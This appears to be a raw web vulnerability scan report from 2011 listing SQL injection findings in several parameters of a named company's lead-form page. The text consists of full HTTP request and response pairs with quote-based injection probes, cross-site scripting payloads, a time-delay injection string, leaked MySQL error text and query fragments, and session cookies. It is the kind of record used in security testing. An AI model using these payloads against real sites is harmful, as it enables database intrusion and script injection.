GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit'&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&emailaddress=Email&firstname=First Name&lastname=</a style=x:expre/**/ssion' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit''&companyname=Company+Name&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:04:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The catId parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the catId parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011'&iusrc=iupsc HTTP/1.1 Referer: http://www.insideup.com/selectvendors.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:53:12 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iupsc' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011'&iusrc=iups' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011''&iusrc=iupsc HTTP/1.1 Referer: http://www.insideup.com/selectvendors.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.0 404 Not Found Date: Mon, 14 Mar 2011 06:53:19 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 106 Connection: close Content-Type: text/html; charset=UTF-8
<h1>Not Found</h1><p>The requested URL /ppc/leadflow/caad00/project.php was not found on this server.</p>
The companyname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the companyname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:53:51 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=pmn51o819kmkiun21acg58ntb7; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The companyname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the companyname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name'&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:06:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=</a style=x:expre/**/ssion(netsparker(0x002302))> ...[SNIP]...
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name''&emailaddress=Email&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:06:05 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 35987
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The emailaddress parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the emailaddress parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:03 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=rh639igkk1lo3veuoj8qbgbcd1; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email'&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The emailaddress parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the emailaddress parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email'&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:34 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 6790 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... </a style=x:expre/**/ssion(netsparker(0x002302))>&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&lastname=</a style=x:expre/**/ssion(netsparker(0x002302))> ...[SNIP]...
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=Email''&firstname=First+Name&lastname=%3C/a%20style=x:expre/**/ssion(netsparker(0x002302))%3E&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=67isp2lo0ihdks7nubieejngk3 Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:08:35 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 51731
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The firstname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the firstname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name'&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:39 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=p4b8e99g21fv8f03jtado7arh2; path=/ Content-Length: 6702 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... <iMg src=N onerror=netsparker(9)>&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code' OR prj.project_pa' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name''&lastname=Last+Name&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:01:40 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=dgh24asoiqhkul4607h81evfo1; path=/ Content-Length: 20 Connection: close Content-Type: text/html; charset=UTF-8
The firstname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the firstname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:13 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=9jf1frv42ta6nebpsngjvh17i6; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name'&lastname=Last Name&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The iusrc parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the iusrc parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc' HTTP/1.1 Referer: http://www.insideup.com/selectvendors.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Content-Length: 2222 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'' OR prj.project_page_url = 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'leadflow/caad00/project.php?catId=30011&iusrc=iupsc'/' union select prj.catId,p' at line 5
Request 2
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc'' HTTP/1.1 Referer: http://www.insideup.com/selectvendors.html User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=2pjnbitej55vkh5io4gs6s4qm1; JSESSIONID=33EE9FE085003FE12148DEE225377D13; OAID=dbc2322be090e669ff41d872456690ee; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A48%3A%22http%3A%2F%2Fwww.insideup.com%2Fteledirectcasestudy.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 06:54:58 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 17689
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <base href="http://www ...[SNIP]...
The lastname parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the lastname parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:54:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Set-Cookie: PHPSESSID=35o0m1mouhdhv4gr2iqparo4a4; path=/ Content-Length: 6638 Connection: close Content-Type: text/html; charset=UTF-8
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... 9,999&attributeId_404=2002__$2,500 - 4,999&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name'&phone=Phone&subcategoryId=30011&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ';WAITFOR DELAY '0:0:25'--&iusrc=iupsc&address=Address&attributeId_342_g=2017__Ac' at line 5
The lastname parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the lastname parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_398=1966__No&attributeId_399%5B%5D=1969__Business+expansion&attributeId_400=1976__Yes&attributeId_401=1980__%245%2c000+-+9%2c999&attributeId_402=1989__6-12+Months&attributeId_403=1995__%241%2c000+-+9%2c999&attributeId_404=2002__%242%2c500+-+4%2c999&button3=Submit&companyname=Company+Name&emailaddress=%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E&firstname=First+Name&lastname=Last+Name'&phone=Phone&subcategoryId=30011&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/caad00/project.php?catId=30011&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
